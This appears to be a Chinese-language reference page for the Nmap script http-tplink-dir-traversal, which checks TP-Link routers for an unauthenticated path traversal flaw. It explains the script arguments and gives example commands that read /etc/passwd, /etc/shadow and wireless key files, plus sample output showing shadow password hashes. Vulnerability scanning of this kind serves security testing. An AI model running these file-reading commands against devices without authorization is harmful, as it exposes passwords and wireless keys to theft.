Nmap Script指令摘要
利用存在於多個 TP-Link 無線路由器中的目錄探索 (traversal) 漏洞,攻擊者可以利用此漏洞在無需驗證的情況下遠端讀取任何設定和密碼文件。
此漏洞已在型號 WR740N、WR740ND 和 WR2543ND 中確認存在,但有幾個使用相同HTTP伺服器的型號,因此我認為它們也可能存在漏洞,感謝任何協助確認其他型號漏洞的幫助者。
其他有趣的檔案:
/tmp/topology.cnf (無線設定)
/tmp/ath0.ap_bss (無線加密金鑰)
Nmap Script指令參數
http-tplink-dir-traversal.rfile下載遠端檔案,預設值:/etc/passwd。
http-tplink-dir-traversal.outfile用來指定檔案的儲存位置,以便將從遠端伺服器下載的檔案保存到您指定的位置;如果不設定這個參數,下載的文件將不會被保存到本地,而只會顯示在命令行中或輸出到其他地方。此外,另一個可能會使用的參數 http.useragent,它用來設定 HTTP 請求的使用者代理 (User-Agent),這可用於模擬不同的使用者代理,以測試伺服器對不同使用者代理的回應。
slaxml.debug當您將 slaxml.debug 設定為啟用時,slaxml 函式庫可能會產生更多的日誌或偵錯消息,以幫助您追蹤和解決 XML 處理中的問題,這些訊息通常對於開發者來說很有用,但在正式的運作環境中,通常應將其禁用,以提高性能和減少不必要的輸出;請至 slaxml 函式庫中了解詳細資訊。
slaxml.debug 用於啟用或禁用在使用 slaxml 函式庫時的偵錯模式,這些訊息有助於您在處理 XML 資料時追蹤問題、發現錯誤、或瞭解代碼的執行流程。
slaxml用於處理 XML 資料的函式庫,XML (可延伸標記語言) 是一種常用於表示結構化資料的標準格式;當您需要解析、產生、或操作 XML 資料時,您可以使用 slaxml 函式庫來簡化這些任務。
http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent這些參數可以控制 HTTP 請求和回應行為,更多詳細資訊和使用範例可以在 http 函式庫中找到。
http.host: 用於設定 HTTP 請求的主機名稱或 IP 位址,您可以將其設定為目標網站的主機名稱或 IP 位址。
http.max-body-size: 用於設定 HTTP 回應內容主體的最大大小(以位元為單位),可以限制所接收的內容大小,防止過大的主體內容回應。
http.max-cache-size: 用於設定 HTTP 回應暫存的最大大小(以位元為單位),控制暫存的大小避免過多的內容被保留。
http.max-pipeline: 用於設定 HTTP 請求的最大通道大小,HTTP 通道允許多個請求在不等待回應的情況下平行發送,此參數可用於控制同時發送的請求數量。
http.pipeline: 用於啟用或禁用 HTTP 通道功能;當啟用時,多個請求可以平行發送,以提高效能。
http.truncated-ok: 用於設定是否允許接收截斷的 HTTP 回應;當設定為 "allow" 時,即使回應被截斷,也不會將其視為錯誤。
http.useragent:用於設定 HTTP 請求中的用戶代理表頭,模擬不同的用戶代理,以測試網站在不同瀏覽器或客戶端上的行為。
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername這些參數用於SMB身份驗證的設定,通常用於存取Windows共享資源,可至 smbauth 了解詳細資訊。
smbdomain (SMB網域名稱):這是指在Windows網路中工作群組或網域名稱,用於識別您要存取的SMB共享資源所在的網路範圍;每個SMB共享資源可能屬於一個特定的網域名稱或工作群組。
smbhash (SMB哈希):這是用於身份驗證的SMB密碼的哈希值 (Hash Value);在某些情況下,密碼不以明文形式傳輸,而是以哈希 (Hash) 形式傳輸,以增加安全性。
smbnoguest (不使用SMB的 guest 帳號):當設定為true時,表示不使用SMB的 guest 帳號進行存取;"guest" 帳號通常是一個無需密碼即可存取的帳號,但可能不具有完全的權限。
smbpassword (SMB密碼):這是用於身份驗證的SMB帳號的密碼,為了存取SMB共享資源,您需要提供正確的密碼。
smbtype (SMB類型):指定SMB協定的類型,通常有不同的SMB協定版本;您需要指定正確的SMB協定版本,確保與SMB共享資源的正確通訊。
smbusername (SMB使用者名稱):用於身份驗證的SMB帳號的使用者名稱,是存取SMB共享資源的身份識別訊息。
vulns.short, vulns.showall這些參數可以自定義漏洞掃描報告的詳細程度,根據您的需求選擇是否顯示更多的漏洞訊息;可至 vulns 函式庫了解更多資訊。
vulns.short:當這個參數設定為true時,可控制 Nmap 只顯示簡短的漏洞報告摘要,僅包含關鍵訊息,而不會包括詳細的技術細節;它決定了漏洞報告的詳細程度。
vulns.showall:當這個參數設定為true時,可控制Nmap顯示所有已知的漏洞訊息,而不僅僅是最嚴重的漏洞,這對於深入了解目標系統的安全性很有用。
Nmap Script指令範例
nmap -p80 --script http-tplink-dir-traversal.nse <target>nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target>Nmap Script指令輸出
PORT STATE SERVICE REASON80/tcp open http syn-ack| http-tplink-dir-traversal:| VULNERABLE:| Path traversal vulnerability in several TP-Link wireless routers| State: VULNERABLE (Exploitable)| Description:| Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.| This vulnerability can be exploited remotely and without authentication.| Confirmed vulnerable models: WR740N, WR740ND, WR2543ND| Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.| Disclosure date: 2012-06-18| Extra information:| /etc/shadow :|| root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::| Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::| bin::10933:0:99999:7:::| daemon::10933:0:99999:7:::| adm::10933:0:99999:7:::| lp:*:10933:0:99999:7:::| sync:*:10933:0:99999:7:::| shutdown:*:10933:0:99999:7:::| halt:*:10933:0:99999:7:::| uucp:*:10933:0:99999:7:::| operator:*:10933:0:99999:7:::| nobody::10933:0:99999:7:::| ap71::10933:0:99999:7:::|| References:Nmap Script動作
action (host, port)MAIN - The script checks for vulnerable devices by attempting to read "etc/shadow" and finding the pattern "root:".ParametersHostportNmap Script作者:
Paulino Calderon
License: Same as Nmap--See https://nmap.org/book/man-legal.html
Comments